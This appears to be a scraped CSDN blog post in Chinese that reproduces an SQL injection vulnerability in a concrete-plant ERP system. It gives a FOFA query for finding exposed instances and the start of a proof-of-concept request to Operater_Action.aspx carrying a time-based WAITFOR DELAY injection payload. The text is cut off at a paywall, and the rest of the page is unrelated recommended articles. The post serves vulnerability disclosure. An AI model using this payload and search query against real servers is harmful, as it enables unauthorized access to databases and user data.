商混ERP系统 Operater_Action.aspx SQL注入漏洞复现

0xSecl

已于 2024-09-14 10:35:22 修改

阅读量146

点赞数 6

分类专栏：漏洞复现文章标签：安全 web安全

于 2024-09-14 09:48:20 首次发布

本文链接：https://blog.csdn.net/qq_41904294/article/details/142250133

版权

漏洞复现专栏收录该内容

866 篇文章 1427 订阅 ¥9.90 ¥99.00

订阅专栏

超级会员免费看

0x01 产品简介

杭州荷花软件有限公司开发的商混ERP系统。这套系统主要是处理建筑公司或者各项工程的搅拌站管理，内部含有销售模块、生产管理模块、实验室模块、人员管理等。

0x02 漏洞概述

商混ERP系统 Operater_Action.aspx 接口存在SQL注入漏洞，未经身份验证的远程攻击者除了可以利用 SQL 注入漏洞获取数据库中的信息（例如，管理员后台密码、站点的用户个人信息）之外，甚至在高权限的情况可向服务器中写入木马，进一步获取服务器系统权限。

0x03 复现环境

FOFA：app="商混ERP系统"

0x04 漏洞复现

PoC

GET /Dispatch/Operater_Action.aspx?action=TaskComplete&id=1%27WAITFOR+DELAY+%270:0:5%27-- HTTP/1.1
Host: 
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
Accept: text/html,application/

了解本专栏

订阅专栏解锁全文

超级会员免费看

确定要放弃本次机会？

福利倒计时

: :

立减 ¥

普通VIP年卡可用

立即使用

0xSecl

关注关注

6
点赞
踩
0

收藏

觉得还不错? 一键收藏
打赏
0
评论
复制链接

分享到 QQ

分享到新浪微博

扫一扫

专栏目录

订阅专栏

【Flink 实战系列】Flink pipeline.operator-chaining 参数使用以及源码解析

JasonLee实时计算

08-28

2453

当我们使用 Flink SQL 提交一个任务，没有给算子单独设置并行度的情况下，默认所有的算子会 chain 在一起，像下面的这样：此时，整个 DAG 图只会显示一个算子，虽然这样有利于数据的传输，可以提高任务的性能，但是缺点也很明显，我们无法看到数据的输入和输出，以及反压相关的 metrics。那在 datastream api 开发的任务中我们可以使用 disableChaining 方法来打断 operatorChain，但是在 SQL 开发的任务中怎么办呢？如果我们想要查看每一个算子的输入和输出的数

jpa mysql sql分页查询语句_Spring boot JPA 原生sql 分页查询报错问题

weixin_39616339的博客

02-17

222

项目使用Jpa，因为具体业务需要，写原生sql@Repositorypublic interface DreamBookDao extends JpaRepository{@Query(value ="SELECT * FROM (SELECT * FROM dream_book AS t WHERE t.name LIKE ?1) q WHERE q.name LIKE ?2", nativeQ...

参与评论您还未登录，请先登录后发表或查看评论

Prometheus-Operater修改Prometheus.yaml配置文件

半生痴狂半生颠的博客

01-18

2268

在多个原生的k8s集群里面安装部署Prometheus-operater后，需要将Prometheus的数据发送至主Prometheus统一管理。发现使用Prometheus-Operater安装的组件受k8s的CRD影响，无法直接修改Prometheus的配置文件。Prometheus-Operater的statefulset类型实际是由自定义的Prometheus的kind控制，而Prometheus的配置文件是由名为prometheus-k8s的Opaque类型的secret控制。

python中calc_calc.py

weixin_35259353的博客

03-01

2191

# coding:utf-8import sysfrom PyQt5 import uicfrom PyQt5.QtWidgets import QApplicationfrom PyQt5.QtWidgets import QMainWindowclass Calc(QMainWindow):def __init__(self):QMainWindow.__init__(self)self.x ...

sqlparser mysql_Apache顶级项目ShardingSphere — SQL Parser的设计与实现

weixin_34363071的博客

01-19

750

导语：SQL作为现代计算机行业的数据处理事实标准，是目前最重要的数据处理接口之一，从传统的DBMS(如MySQL、Oracle)，到主流的计算框架(如spark，flink)都提供了SQL的解析引擎，因此想对sql进行精细化的操作，一定离不开SQL Parser。Apache ShardingSphere 是一套开源的分布式数据库中间件解决方案组成的生态圈，需要对SQL进行精细化的操作，如改写，加...

energyop.zip_TEO_bornr6u_matlab_teo operater_teo解调 matlab

07-15

标题中的"energyop.zip_TEO_bornr6u_matlab_teo operater_teo解调 matlab" 提到的核心概念是TEO（Teager Energy Operator），它是一种信号处理技术，主要用在非线性能量分析中。这个压缩包内容可能是与在MATLAB环境...

Access-operater-class.rar_C＃ Access_access_c# access操作类

09-19

为了防止SQL注入攻击和提高代码可读性，类中可能会使用`OleDbCommand`的`Parameters`集合来添加参数，如`command.Parameters.AddWithValue("@param1", value)`。 6. **错误处理**：考虑到数据库操作可能出现异常...

OPERATER_NUM解析

08-10

这些操作符可能是一组预定义的操作，例如SQL查询中的运算符（如等于、大于、小于等）、数据库操作命令（如SELECT、INSERT、UPDATE等），或者是函数调用中的操作码（函数标识符对应的整数值）。当你看到 `OPERATER_...

FANUC机器人用户密码的清除方法_20210412135304.pdf

04-12

需要注意的是，文档中提到的操作步骤和操作模式可能会随着不同版本的FANUC控制系统而有所差异，因此在进行类似操作之前，一定要参考相应的用户手册和最新的系统更新。对于没有相关经验的用户来说，在操作前寻求专业...

#ifndef _array_operater_H #define _array_operator_H

05-26

应该是 `#ifndef _array_operator_H` 而不是 `#ifndef _array_operater_H`。同时，最后一行也应该是 `#endif` 而不是 `#define`。正确的代码如下所示： ``` #ifndef _array_operator_H #define _array_operator_H ...

【双语新闻】AGI安全与对齐，DeepMind近期工作

最新发布

qq_29883477的博客

09-13

674

的开发和运行，包括危险能力评估）。这还没有达到我们的需求：诚实策略的时间复杂度只在人类可判断的论证长度上是多项式的，而我们希望它在AI可判断的论证长度上是高效的。我们已经看到了一些使用Tracr的例子，但其使用的范围并没有如我们所希望的那样广泛，因为由Tracr生成的模型与在野外训练的模型有很大的不同。：尽管这项工作未能实现其雄心勃勃的目标，即在超置的早期MLP层中机械地理解事实是如何计算的，但它确实提供了进一步的证据表明超置正在发生，并否定了关于事实回忆可能如何运作的一些简单假设。

注册安全分析报告：熊猫频道

Explinks的博客

09-10

490

熊猫频道作为央视的子频道，采用的还是老一代的图形验证码已经落伍了，用户体验一般，容易被破解，一旦被国际黑客发起攻击，将会对老百姓形成骚扰，影响声誉。很多人在短信服务刚开始建设的阶段，可能不会在安全方面考虑太多，理由有很多。比如：“需求这么赶，当然是先实现功能啊”，“业务量很小啦，系统就这么点人用，不怕的” ， “我们怎么会被盯上呢，不可能的”等等。有一些理由虽然有道理，但是该来的总是会来的。前期欠下来的债，总是要还的。越早还，问题就越小，损失就越低。

Boot header格式描述详细信息。CSU DMA用于数据传输。安全流开关允许数据移动。PL配置通过PCAP接口。PL bit流包含设备配置数据。

lsh11111的博客

09-13

346

此外，BootROM可以使用8位并行配置中的宽度检测参数值和image识别参数值来检测Quad-SPI接口的预期I/O宽度。在Quad-SPI引导过程中，BootROM会根据宽度检测参数值来选择相应的I/O配置，以确保正确访问Quad-SPI设备。- Reserved for interrupts: 用于存储中断相关信息，特别是在LQSPI地址空间中的默认0x01F中断向量被更改时，在XIP启动模式下使用。- 安全头初始化向量: 用于PMU FW和FSBL的安全头的初始化向量。

2024网络安全人才实战能力白皮书安全测试评估篇

2301_76786857的博客

09-13

584

据了解，白皮书通过大量一线网络安全从业人员、网络安全相关专业在校学生问卷调研数据及网络安全人才测评演练数据分析，呈现供给侧、需求侧安全测试评估人才的基本情况、培养情况和岗位实践，并以理论与实践相结合的方式创新提出了一套立体化综合评价安全测评人才能力的——GPE方法，为数字中国建设中的安全测试评估人才培养和评价提供可行方案。当前，在政治、经济、文化和社会安全等多个领域相互交织影响的背景下，网络安全测评是政府保障国家安全和社会稳定的重要手段之一，社会急需网络安全测评人才，防范化解风险提供安全保障。

网站安全需求分析与安全保护工程

weixin_49171105的博客

09-09

739

网站：是基于B/S技术架构的综合信息服务平台，主要提供网页信息及业务后台对外接口服务。

首个大模型供应链安全领域的国际标准，WDTA《大模型供应链安全要求》标准解读

银行信息系统应用架构导论

09-10

202

大模型供应链安全要求》标准通过提供供应链各个层面的安全管理要求，为组织构建更加安全的AI生态系统提供了明确的指导。这些模型在带来创新和便利的同时，也伴随着安全风险的增加。《大模型供应链安全要求》提出了大型语言模型（LLMs）的供应链安全保护框架，提出了管理LLMs开发、运营和维护（O&M）中涉及的供应链安全风险和供应活动的要求，并提供了常见的供应链安全风险和典型安全案例等相关信息。对供应商进行严格的选择和持续评估，确保其提供的产品和服务的真实性、完整性和准确性，并防止信息在供应链中被篡改或泄露。

Web3 项目安全手册

2301_76786857的博客

09-10

264

现如今针对 Web3 项目的攻击手法层出不穷，且项目之间的交互也越发复杂，在各个项目之间的交互经常会引入新的安全问题，而大部分 Web3 项目研发团队普遍缺少的一线的安全攻防经验，并且在进行 Web3 项目研发的时候，重点关注的是项目整体的商业论证以及业务功能的实现，而没有更多的精力完成安全体系的建设。通常项目方团队为了确保 Web3 项目的安全会聘请优秀的区块链安全团队对其代码进行安全审计，但是区块链安全团队的审计仅仅是短期的引导，并不能让项目方团队建立属于自己的安全体系。

【免费刷题】实验室安全第一知识题库分享

nulixueBe的博客

09-13

326

人工智能识别上海985大学的实验室安全知识手册，生成题库，直接刷题

【绿盟科技盟管家-注册/登录安全分析报告】

09-10

1209

绿盟科技应用互联网技术启动“盟管家”服务模式。通过全方位的数据集成平台，实现信息互通、化繁为简。已注册用户可实时了解Case处理进度及情况，帮助客户智能化判断紧急漏洞、设备版本，实时提供风险预警、升级提醒等。作为老牌安全头部科技公司，技术实力也应该不错，但采用的还是老一代的图形验证码已经落伍了，用户体验一般，容易被破解，一旦被国际黑客发起攻击，将会对老百姓形成骚扰，影响声誉。很多人在短信服务刚开始建设的阶段，可能不会在安全方面考虑太多，理由有很多。比如：“需求这么赶，当然是先实现功能啊”，“